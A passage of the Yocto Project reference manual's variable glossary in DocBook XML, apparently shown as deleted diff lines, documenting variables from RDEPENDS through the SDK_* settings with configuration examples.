- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
- variable.
- </para>
-
- <para>
- Because the <filename>RDEPENDS</filename> variable applies
- to packages being built, you should always use the variable
- in a form with an attached package name (remember that a
- single recipe can build multiple packages).
- For example, suppose you are building a development package
- that depends on the <filename>perl</filename> package.
- In this case, you would use the following
- <filename>RDEPENDS</filename> statement:
- <literallayout class='monospaced'>
- RDEPENDS_${PN}-dev += "perl"
- </literallayout>
- In the example, the development package depends on
- the <filename>perl</filename> package.
- Thus, the <filename>RDEPENDS</filename> variable has the
- <filename>${PN}-dev</filename> package name as part of the
- variable.
- <note>
- <title>Caution</title>
- <filename>RDEPENDS_${PN}-dev</filename> includes
- <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>
- by default.
- This default is set in the BitBake configuration file
- (<filename>meta/conf/bitbake.conf</filename>).
- Be careful not to accidentally remove
- <filename>${PN}</filename> when modifying
- <filename>RDEPENDS_${PN}-dev</filename>.
- Use the "+=" operator rather than the "=" operator.
- </note>
- </para>
-
- <para>
- The package names you use with
- <filename>RDEPENDS</filename> must appear as they would in
- the <filename>PACKAGES</filename> variable.
- The
- <link linkend='var-PKG'><filename>PKG</filename></link>
- variable allows a different name to be used for
- the final package (e.g. the
- <link linkend='ref-classes-debian'><filename>debian</filename></link>
- class uses this to rename packages), but this final package
- name cannot be used with <filename>RDEPENDS</filename>,
- which makes sense as <filename>RDEPENDS</filename> is meant
- to be independent of the package format used.
- </para>
-
- <para>
- BitBake, which the OpenEmbedded build system uses, supports
- specifying versioned dependencies.
- Although the syntax varies depending on the packaging
- format, BitBake hides these differences from you.
- Here is the general syntax to specify versions with
- the <filename>RDEPENDS</filename> variable:
- <literallayout class='monospaced'>
- RDEPENDS_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
- </literallayout>
- For <replaceable>operator</replaceable>, you can specify the
- following:
- <literallayout class='monospaced'>
- =
- &lt;
- &gt;
- &lt;=
- &gt;=
- </literallayout>
- For <replaceable>version</replaceable>, provide the version
- number.
- <note><title>Tip</title>
- You can use
- <link linkend='var-EXTENDPKGV'><filename>EXTENDPKGV</filename></link>
- to provide a full package version specification.
- </note>
- For example, the following sets up a dependency on version
- 1.2 or greater of the package <filename>foo</filename>:
- <literallayout class='monospaced'>
- RDEPENDS_${PN} = "foo (>= 1.2)"
- </literallayout>
- </para>
-
- <para>
- For information on build-time dependencies, see the
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
- variable.
- You can also see the
- "<ulink url='&YOCTO_DOCS_BB_URL;#tasks'>Tasks</ulink>" and
- "<ulink url='&YOCTO_DOCS_BB_URL;#dependencies'>Dependencies</ulink>"
- sections in the BitBake User Manual for additional
- information on tasks and dependencies.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-REQUIRED_DISTRO_FEATURES'><glossterm>REQUIRED_DISTRO_FEATURES</glossterm>
- <info>
- REQUIRED_DISTRO_FEATURES[doc] = "When a recipe inherits the distro_features_check class, this variable identifies distribution features that must exist in the current configuration in order for the OpenEmbedded build system to build the recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-distro_features_check'><filename>distro_features_check</filename></link>
- class, this
- variable identifies distribution features that must
- exist in the current configuration in order for the
- OpenEmbedded build system to build the recipe.
- In other words, if the
- <filename>REQUIRED_DISTRO_FEATURES</filename> variable
- lists a feature that does not appear in
- <filename>DISTRO_FEATURES</filename> within the
- current configuration, an error occurs and the
- build stops.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-RM_WORK_EXCLUDE'><glossterm>RM_WORK_EXCLUDE</glossterm>
- <info>
- RM_WORK_EXCLUDE[doc] = "With rm_work enabled, this variable specifies a list of packages whose work directories should not be removed."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- With <filename>rm_work</filename> enabled, this
- variable specifies a list of recipes whose work directories
- should not be removed.
- See the "<link linkend='ref-classes-rm-work'><filename>rm_work.bbclass</filename></link>"
- section for more details.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ROOT_HOME'><glossterm>ROOT_HOME</glossterm>
- <info>
- ROOT_HOME[doc] = "Defines the root home directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the root home directory.
- By default, this directory is set as follows in the
- BitBake configuration file:
- <literallayout class='monospaced'>
- ROOT_HOME ??= "/home/root"
- </literallayout>
- <note>
- This default value is likely used because some
- embedded solutions prefer to have a read-only root
- filesystem and prefer to keep writeable data in one
- place.
- </note>
- </para>
-
- <para>
- You can override the default by setting the variable
- in any layer or in the <filename>local.conf</filename> file.
- Because the default is set using a "weak" assignment
- (i.e. "??="), you can use either of the following forms
- to define your override:
- <literallayout class='monospaced'>
- ROOT_HOME = "/root"
- ROOT_HOME ?= "/root"
- </literallayout>
- These override examples use <filename>/root</filename>,
- which is probably the most commonly used override.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ROOTFS'><glossterm>ROOTFS</glossterm>
- <info>
- ROOTFS[doc] = "Indicates a filesystem image to include as the root filesystem."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Indicates a filesystem image to include as the root
- filesystem.
- </para>
-
- <para>
- The <filename>ROOTFS</filename> variable is an optional
- variable used with the
- <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
- class.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ROOTFS_POSTINSTALL_COMMAND'><glossterm>ROOTFS_POSTINSTALL_COMMAND</glossterm>
- <info>
- ROOTFS_POSTINSTALL_COMMAND[doc] = "Specifies a list of functions to call after installing packages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions to call after the
- OpenEmbedded build system has installed packages.
- You can specify functions separated by semicolons:
- <literallayout class='monospaced'>
- ROOTFS_POSTINSTALL_COMMAND += "<replaceable>function</replaceable>; ... "
- </literallayout>
- </para>
-
- <para>
- If you need to pass the root filesystem path to a command
- within a function, you can use
- <filename>${IMAGE_ROOTFS}</filename>, which points to
- the directory that becomes the root filesystem image.
- See the
- <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ROOTFS_POSTPROCESS_COMMAND'><glossterm>ROOTFS_POSTPROCESS_COMMAND</glossterm>
- <info>
- ROOTFS_POSTPROCESS_COMMAND[doc] = "Specifies a list of functions to call once the OpenEmbedded build system has created the root filesystem."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions to call once the
- OpenEmbedded build system has created the root filesystem.
- You can specify functions separated by semicolons:
- <literallayout class='monospaced'>
- ROOTFS_POSTPROCESS_COMMAND += "<replaceable>function</replaceable>; ... "
- </literallayout>
- </para>
-
- <para>
- If you need to pass the root filesystem path to a command
- within a function, you can use
- <filename>${IMAGE_ROOTFS}</filename>, which points to
- the directory that becomes the root filesystem image.
- See the
- <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ROOTFS_POSTUNINSTALL_COMMAND'><glossterm>ROOTFS_POSTUNINSTALL_COMMAND</glossterm>
- <info>
- ROOTFS_POSTUNINSTALL_COMMAND[doc] = "Specifies a list of functions to call after removal of unneeded packages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions to call after the
- OpenEmbedded build system has removed unnecessary
- packages.
- When runtime package management is disabled in the
- image, several packages are removed including
- <filename>base-passwd</filename>,
- <filename>shadow</filename>, and
- <filename>update-alternatives</filename>.
- You can specify functions separated by semicolons:
- <literallayout class='monospaced'>
- ROOTFS_POSTUNINSTALL_COMMAND += "<replaceable>function</replaceable>; ... "
- </literallayout>
- </para>
-
- <para>
- If you need to pass the root filesystem path to a command
- within a function, you can use
- <filename>${IMAGE_ROOTFS}</filename>, which points to
- the directory that becomes the root filesystem image.
- See the
- <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ROOTFS_PREPROCESS_COMMAND'><glossterm>ROOTFS_PREPROCESS_COMMAND</glossterm>
- <info>
- ROOTFS_PREPROCESS_COMMAND[doc] = "Specifies a list of functions to call before the OpenEmbedded build system has created the root filesystem."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions to call before the
- OpenEmbedded build system has created the root filesystem.
- You can specify functions separated by semicolons:
- <literallayout class='monospaced'>
- ROOTFS_PREPROCESS_COMMAND += "<replaceable>function</replaceable>; ... "
- </literallayout>
- </para>
-
- <para>
- If you need to pass the root filesystem path to a command
- within a function, you can use
- <filename>${IMAGE_ROOTFS}</filename>, which points to
- the directory that becomes the root filesystem image.
- See the
- <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-RPROVIDES'><glossterm>RPROVIDES</glossterm>
- <info>
- RPROVIDES[doc] = "A list of package name aliases that a package also provides. These aliases are useful for satisfying runtime dependencies of other packages both during the build and on the target."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of package name aliases that a package also provides.
- These aliases are useful for satisfying runtime dependencies
- of other packages both during the build and on the target
- (as specified by
- <filename><link linkend='var-RDEPENDS'>RDEPENDS</link></filename>).
- <note>
- A package's own name is implicitly already in its
- <filename>RPROVIDES</filename> list.
- </note>
- </para>
-
- <para>
- As with all package-controlling variables, you must always
- use the variable in conjunction with a package name override.
- Here is an example:
- <literallayout class='monospaced'>
- RPROVIDES_${PN} = "widget-abi-2"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-RRECOMMENDS'><glossterm>RRECOMMENDS</glossterm>
- <info>
- RRECOMMENDS[doc] = "A list of packages that extends the usability of a package being built. The package being built does not depend on this list of packages in order to successfully build, but needs them for the extended usability."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of packages that extends the usability of a package
- being built.
- The package being built does not depend on this list of
- packages in order to successfully build, but rather
- uses them for extended usability.
- To specify runtime dependencies for packages, see the
- <filename><link linkend='var-RDEPENDS'>RDEPENDS</link></filename>
- variable.
- </para>
-
- <para>
- The package manager will automatically install the
- <filename>RRECOMMENDS</filename> list of packages when
- installing the built package.
- However, you can prevent listed packages from being
- installed by using the
- <link linkend='var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></link>,
- <link linkend='var-NO_RECOMMENDATIONS'><filename>NO_RECOMMENDATIONS</filename></link>,
- and
- <link linkend='var-PACKAGE_EXCLUDE'><filename>PACKAGE_EXCLUDE</filename></link>
- variables.
- </para>
-
- <para>
- Packages specified in
- <filename>RRECOMMENDS</filename> need not actually be
- produced.
- However, a recipe must exist that provides each package,
- either through the
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
- or
- <link linkend='var-PACKAGES_DYNAMIC'><filename>PACKAGES_DYNAMIC</filename></link>
- variables or the
- <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>
- variable, or an error will occur during the build.
- If such a recipe does exist and the package is not produced,
- the build continues without error.
- </para>
-
- <para>
- Because the <filename>RRECOMMENDS</filename> variable
- applies to packages being built, you should always attach
- an override to the variable to specify the particular
- package whose usability is being extended.
- For example, suppose you are building a development package
- that is extended to support wireless functionality.
- In this case, you would use the following:
- <literallayout class='monospaced'>
- RRECOMMENDS_${PN}-dev += "<replaceable>wireless_package_name</replaceable>"
- </literallayout>
- In the example, the package name
- (<filename>${<link linkend='var-PN'>PN</link>}-dev</filename>)
- must appear as it would in the
- <filename>PACKAGES</filename> namespace before any renaming
- of the output package by classes such as
- <filename>debian.bbclass</filename>.
- </para>
-
- <para>
- BitBake, which the OpenEmbedded build system uses, supports
- specifying versioned recommends.
- Although the syntax varies depending on the packaging
- format, BitBake hides these differences from you.
- Here is the general syntax to specify versions with
- the <filename>RRECOMMENDS</filename> variable:
- <literallayout class='monospaced'>
- RRECOMMENDS_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
- </literallayout>
- For <filename>operator</filename>, you can specify the
- following:
- <literallayout class='monospaced'>
- =
- &lt;
- &gt;
- &lt;=
- &gt;=
- </literallayout>
- For example, the following sets up a recommend on version
- 1.2 or greater of the package <filename>foo</filename>:
- <literallayout class='monospaced'>
- RRECOMMENDS_${PN} = "foo (>= 1.2)"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-RREPLACES'><glossterm>RREPLACES</glossterm>
- <info>
- RREPLACES[doc] = "A list of packages replaced by a package. The package manager uses this variable to determine which package should be installed to replace other package(s) during an upgrade."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of packages replaced by a package.
- The package manager uses this variable to determine which
- package should be installed to replace other package(s)
- during an upgrade.
- In order to also have the other package(s) removed at the
- same time, you must add the name of the other
- package to the
- <filename><link linkend='var-RCONFLICTS'>RCONFLICTS</link></filename> variable.
- </para>
-
- <para>
- As with all package-controlling variables, you must use
- this variable in conjunction with a package name
- override.
- Here is an example:
- <literallayout class='monospaced'>
- RREPLACES_${PN} = "<replaceable>other_package_being_replaced</replaceable>"
- </literallayout>
- </para>
-
- <para>
- BitBake, which the OpenEmbedded build system uses, supports
- specifying versioned replacements.
- Although the syntax varies depending on the packaging
- format, BitBake hides these differences from you.
- Here is the general syntax to specify versions with
- the <filename>RREPLACES</filename> variable:
- <literallayout class='monospaced'>
- RREPLACES_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
- </literallayout>
- For <filename>operator</filename>, you can specify the
- following:
- <literallayout class='monospaced'>
- =
- &lt;
- &gt;
- &lt;=
- &gt;=
- </literallayout>
- For example, the following sets up a replacement using
- version 1.2 or greater of the package
- <filename>foo</filename>:
- <literallayout class='monospaced'>
- RREPLACES_${PN} = "foo (>= 1.2)"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-RSUGGESTS'><glossterm>RSUGGESTS</glossterm>
- <info>
- RSUGGESTS[doc] = "A list of additional packages that you can suggest for installation by the package manager at the time a package is installed. Not all package managers support this functionality."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of additional packages that you can suggest for
- installation by the package manager at the time a package
- is installed.
- Not all package managers support this functionality.
- </para>
-
- <para>
- As with all package-controlling variables, you must always
- use this variable in conjunction with a package name
- override.
- Here is an example:
- <literallayout class='monospaced'>
- RSUGGESTS_${PN} = "<replaceable>useful_package</replaceable> <replaceable>another_package</replaceable>"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-s'><title>S</title>
-
- <glossentry id='var-S'><glossterm>S</glossterm>
- <info>
- S[doc] = "The location in the Build Directory where unpacked package source code resides."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The location in the
- <link linkend='build-directory'>Build Directory</link>
- where unpacked recipe source code resides.
- By default, this directory is
- <filename>${</filename><link linkend='var-WORKDIR'><filename>WORKDIR</filename></link><filename>}/${</filename><link linkend='var-BPN'><filename>BPN</filename></link><filename>}-${</filename><link linkend='var-PV'><filename>PV</filename></link><filename>}</filename>,
- where <filename>${BPN}</filename> is the base recipe name
- and <filename>${PV}</filename> is the recipe version.
- If the source tarball extracts the code to a directory
- named anything other than <filename>${BPN}-${PV}</filename>,
- or if the source code is fetched from an SCM such as
- Git or Subversion, then you must set <filename>S</filename>
- in the recipe so that the OpenEmbedded build system
- knows where to find the unpacked source.
- </para>
-
- <para>
- As an example, assume a
- <link linkend='source-directory'>Source Directory</link>
- top-level folder named <filename>poky</filename> and a
- default Build Directory at <filename>poky/build</filename>.
- In this case, the work directory the build system uses
- to keep the unpacked recipe for <filename>db</filename>
- is the following:
- <literallayout class='monospaced'>
- poky/build/tmp/work/qemux86-poky-linux/db/5.1.19-r3/db-5.1.19
- </literallayout>
- The unpacked source code resides in the
- <filename>db-5.1.19</filename> folder.
- </para>
-
- <para>
- This next example assumes a Git repository.
- By default, Git repositories are cloned to
- <filename>${WORKDIR}/git</filename> during
- <link linkend='ref-tasks-fetch'><filename>do_fetch</filename></link>.
- Since this path is different from the default value of
- <filename>S</filename>, you must set it specifically
- so the source can be located:
- <literallayout class='monospaced'>
- SRC_URI = "git://path/to/repo.git"
- S = "${WORKDIR}/git"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SANITY_REQUIRED_UTILITIES'><glossterm>SANITY_REQUIRED_UTILITIES</glossterm>
- <info>
- SANITY_REQUIRED_UTILITIES[doc] = "Specifies a list of command-line utilities that should be checked for during the initial sanity checking process when running BitBake."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of command-line utilities that should be
- checked for during the initial sanity checking process when
- running BitBake.
- If any of the utilities are not installed on the build host,
- then BitBake immediately exits with an error.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SANITY_TESTED_DISTROS'><glossterm>SANITY_TESTED_DISTROS</glossterm>
- <info>
- SANITY_TESTED_DISTROS[doc] = "A list of the host distribution identifiers that the build system has been tested against."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of the host distribution identifiers that the
- build system has been tested against.
- Identifiers consist of the host distributor ID
- followed by the release,
- as reported by the <filename>lsb_release</filename> tool
- or as read from <filename>/etc/lsb-release</filename>.
- Separate the list items with explicit newline
- characters (<filename>\n</filename>).
- If <filename>SANITY_TESTED_DISTROS</filename> is not empty
- and the current value of
- <link linkend='var-NATIVELSBSTRING'><filename>NATIVELSBSTRING</filename></link>
- does not appear in the list, then the build system reports
- a warning that indicates the current host distribution has
- not been tested as a build host.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_ARCH'><glossterm>SDK_ARCH</glossterm>
- <info>
- SDK_ARCH[doc] = "The target architecture for the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The target architecture for the SDK.
- Typically, you do not directly set this variable.
- Instead, use
- <link linkend='var-SDKMACHINE'><filename>SDKMACHINE</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_DEPLOY'><glossterm>SDK_DEPLOY</glossterm>
- <info>
- SDK_DEPLOY[doc] = "The directory set up and used by the populate_sdk_base to which the SDK is deployed."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The directory set up and used by the
- <link linkend='ref-classes-populate-sdk'><filename>populate_sdk_base</filename></link>
- class to which the SDK is deployed.
- The <filename>populate_sdk_base</filename> class defines
- <filename>SDK_DEPLOY</filename> as follows:
- <literallayout class='monospaced'>
- SDK_DEPLOY = "${TMPDIR}/deploy/sdk"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_DIR'><glossterm>SDK_DIR</glossterm>
- <info>
- SDK_DIR[doc] = "The parent directory used by the OpenEmbedded build system when creating SDK output."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The parent directory used by the OpenEmbedded build system
- when creating SDK output.
- The
- <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
- class defines the variable as follows:
- <literallayout class='monospaced'>
- SDK_DIR = "${WORKDIR}/sdk"
- </literallayout>
- <note>
- The <filename>SDK_DIR</filename> directory is a
- temporary directory as it is part of
- <filename>WORKDIR</filename>.
- The final output directory is
- <link linkend='var-SDK_DEPLOY'><filename>SDK_DEPLOY</filename></link>.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_EXT_TYPE'><glossterm>SDK_EXT_TYPE</glossterm>
- <info>
- SDK_EXT_TYPE[doc] = "Controls whether or not shared state artifacts are copied into the extensible SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Controls whether or not shared state artifacts are copied
- into the extensible SDK.
- The default value of "full" copies all of the required
- shared state artifacts into the extensible SDK.
- The value "minimal" leaves these artifacts out of the
- SDK.
- <note>
- If you set the variable to "minimal", you need to
- ensure
- <link linkend='var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></link>
- is set in the SDK's configuration to enable the
- artifacts to be fetched as needed.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_HOST_MANIFEST'><glossterm>SDK_HOST_MANIFEST</glossterm>
- <info>
- SDK_HOST_MANIFEST[doc] = "The manifest file for the host part of the SDK. This file lists all the installed packages that make up the host part of the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The manifest file for the host part of the SDK.
- This file lists all the installed packages that make up
- the host part of the SDK.
- The file contains package information on a line-per-package
- basis as follows:
- <literallayout class='monospaced'>
- <replaceable>packagename</replaceable> <replaceable>packagearch</replaceable> <replaceable>version</replaceable>
- </literallayout>
- </para>
-
- <para>
- The
- <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
- class defines the manifest file as follows:
- <literallayout class='monospaced'>
- SDK_HOST_MANIFEST = "${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.host.manifest"
- </literallayout>
- The location is derived using the
- <link linkend='var-SDK_DEPLOY'><filename>SDK_DEPLOY</filename></link>
- and
- <link linkend='var-TOOLCHAIN_OUTPUTNAME'><filename>TOOLCHAIN_OUTPUTNAME</filename></link>
- variables.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_INCLUDE_PKGDATA'><glossterm>SDK_INCLUDE_PKGDATA</glossterm>
- <info>
- SDK_INCLUDE_PKGDATA[doc] = "When set to "1", specifies to include the packagedata for all recipes in the "world" target in the extensible SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When set to "1", specifies to include the packagedata for
- all recipes in the "world" target in the extensible SDK.
- Including this data allows the
- <filename>devtool search</filename> command to find these
- recipes in search results, as well as allows the
- <filename>devtool add</filename> command to map
- dependencies more effectively.
- <note>
- Enabling the <filename>SDK_INCLUDE_PKGDATA</filename>
- variable significantly increases build time because
- all of world needs to be built.
- Enabling the variable also slightly increases the size
- of the extensible SDK.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_INCLUDE_TOOLCHAIN'><glossterm>SDK_INCLUDE_TOOLCHAIN</glossterm>
- <info>
- SDK_INCLUDE_TOOLCHAIN[doc] = "When set to "1", specifies to include the toolchain in the extensible SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When set to "1", specifies to include the toolchain in the
- extensible SDK.
- Including the toolchain is useful particularly when
- <link linkend='var-SDK_EXT_TYPE'><filename>SDK_EXT_TYPE</filename></link>
- is set to "minimal" to keep the SDK reasonably small
- but you still want to provide a usable toolchain.
- For example, suppose you want to use the toolchain from an
- IDE or from other tools and you do not
- want to perform additional steps to install the toolchain.
- </para>
-
- <para>
- The <filename>SDK_INCLUDE_TOOLCHAIN</filename> variable
- defaults to "0" if <filename>SDK_EXT_TYPE</filename>
- is set to "minimal", and defaults to "1" if
- <filename>SDK_EXT_TYPE</filename> is set to "full".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_INHERIT_BLACKLIST'><glossterm>SDK_INHERIT_BLACKLIST</glossterm>
- <info>
- SDK_INHERIT_BLACKLIST[doc] = "A list of classes to remove from the INHERIT value globally within the extensible SDK configuration."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of classes to remove from the
- <link linkend='var-INHERIT'><filename>INHERIT</filename></link>
- value globally within the extensible SDK configuration.
- The
- <link linkend='ref-classes-populate-sdk-*'><filename>populate-sdk-ext</filename></link>
- class sets the default value:
- <literallayout class='monospaced'>
- SDK_INHERIT_BLACKLIST ?= "buildhistory icecc"
- </literallayout>
- </para>
-
- <para>
- Some classes are not generally applicable within
- the extensible SDK context.
- You can use this variable to disable those classes.
- </para>
-
- <para>
- For additional information on how to customize the
- extensible SDK's configuration, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-configuring-the-extensible-sdk'>Configuring the Extensible SDK</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_LOCAL_CONF_BLACKLIST'><glossterm>SDK_LOCAL_CONF_BLACKLIST</glossterm>
- <info>
- SDK_LOCAL_CONF_BLACKLIST[doc] = "A list of variables not allowed through from the build system configuration into the extensible SDK configuration."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of variables not allowed through from the
- OpenEmbedded build system configuration into the extensible
- SDK configuration.
- Usually, these are variables that are specific to the
- machine on which the build system is running and thus
- would be potentially problematic within the extensible SDK.
- </para>
-
- <para>By default,
- <filename>SDK_LOCAL_CONF_BLACKLIST</filename> is set in the
- <link linkend='ref-classes-populate-sdk-*'><filename>populate-sdk-ext</filename></link>
- class and excludes the following variables:
- <literallayout class='monospaced'>
- <link linkend='var-CONF_VERSION'>CONF_VERSION</link>
- <link linkend='var-BB_NUMBER_THREADS'>BB_NUMBER_THREADS</link>
- <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_NUMBER_PARSE_THREADS'>BB_NUMBER_PARSE_THREADS</ulink>
- <link linkend='var-PARALLEL_MAKE'>PARALLEL_MAKE</link>
- <link linkend='var-PRSERV_HOST'>PRSERV_HOST</link>
- <link linkend='var-SSTATE_MIRRORS'>SSTATE_MIRRORS</link>
- <link linkend='var-DL_DIR'>DL_DIR</link>
- <link linkend='var-SSTATE_DIR'>SSTATE_DIR</link>
- <link linkend='var-TMPDIR'>TMPDIR</link>
- <link linkend='var-BB_SERVER_TIMEOUT'>BB_SERVER_TIMEOUT</link>
- </literallayout>
- </para>
-
- <para>
- For additional information on how to customize the
- extensible SDK's configuration, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-configuring-the-extensible-sdk'>Configuring the Extensible SDK</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual.
- </para>
-
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_LOCAL_CONF_WHITELIST'><glossterm>SDK_LOCAL_CONF_WHITELIST</glossterm>
- <info>
- SDK_LOCAL_CONF_WHITELIST[doc] = "A list of variables allowed through from the build system configuration into the extensible SDK configuration."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of variables allowed through from the OpenEmbedded
- build system configuration into the extensible SDK
- configuration.
- By default, the list of variables is empty and is set in
- the
- <link linkend='ref-classes-populate-sdk-*'><filename>populate-sdk-ext</filename></link>
- class.
- </para>
-
- <para>
- This list overrides the variables specified using the
- <link linkend='var-SDK_LOCAL_CONF_BLACKLIST'><filename>SDK_LOCAL_CONF_BLACKLIST</filename></link>
- variable as well as any variables identified by automatic
- blacklisting due to the "/" character being found at the
- start of the value, which is usually indicative of being a
- path and thus might not be valid on the system where the
- SDK is installed.
- </para>
-
- <para>
- For additional information on how to customize the
- extensible SDK's configuration, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-configuring-the-extensible-sdk'>Configuring the Extensible SDK</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_NAME'><glossterm>SDK_NAME</glossterm>
- <info>
- SDK_NAME[doc] = "The base name for SDK output files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The base name for SDK output files.
- The name is derived from the
- <link linkend='var-DISTRO'><filename>DISTRO</filename></link>,
- <link linkend='var-TCLIBC'><filename>TCLIBC</filename></link>,
- <link linkend='var-SDK_ARCH'><filename>SDK_ARCH</filename></link>,
- <link linkend='var-IMAGE_BASENAME'><filename>IMAGE_BASENAME</filename></link>,
- and
- <link linkend='var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></link>
- variables:
- <literallayout class='monospaced'>
- SDK_NAME = "${DISTRO}-${TCLIBC}-${SDK_ARCH}-${IMAGE_BASENAME}-${TUNE_PKGARCH}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_OS'><glossterm>SDK_OS</glossterm>
- <info>
- SDK_OS[doc] = "The operating system for which the SDK will be built."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the operating system for which the SDK
- will be built.
- The default value is the value of
- <link linkend='var-BUILD_OS'><filename>BUILD_OS</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_OUTPUT'><glossterm>SDK_OUTPUT</glossterm>
- <info>
- SDK_OUTPUT[doc] = "The location used by the OpenEmbedded build system when creating SDK output."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The location used by the OpenEmbedded build system when
- creating SDK output.
- The
- <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
- class defines the variable as follows:
- <literallayout class='monospaced'>
- SDK_DIR = "${WORKDIR}/sdk"
- SDK_OUTPUT = "${SDK_DIR}/image"
- SDK_DEPLOY = "${DEPLOY_DIR}/sdk"
- </literallayout>
- <note>
- The <filename>SDK_OUTPUT</filename> directory is a
- temporary directory as it is part of
- <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
- by way of
- <link linkend='var-SDK_DIR'><filename>SDK_DIR</filename></link>.
- The final output directory is
- <link linkend='var-SDK_DEPLOY'><filename>SDK_DEPLOY</filename></link>.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_PACKAGE_ARCHS'><glossterm>SDK_PACKAGE_ARCHS</glossterm>
- <info>
- SDK_PACKAGE_ARCHS[doc] = "Specifies a list of architectures compatible with the SDK machine. This variable is set automatically and should not normally be hand-edited."
- </info>
- <glossdef>
- <para role="glossdeffirst">
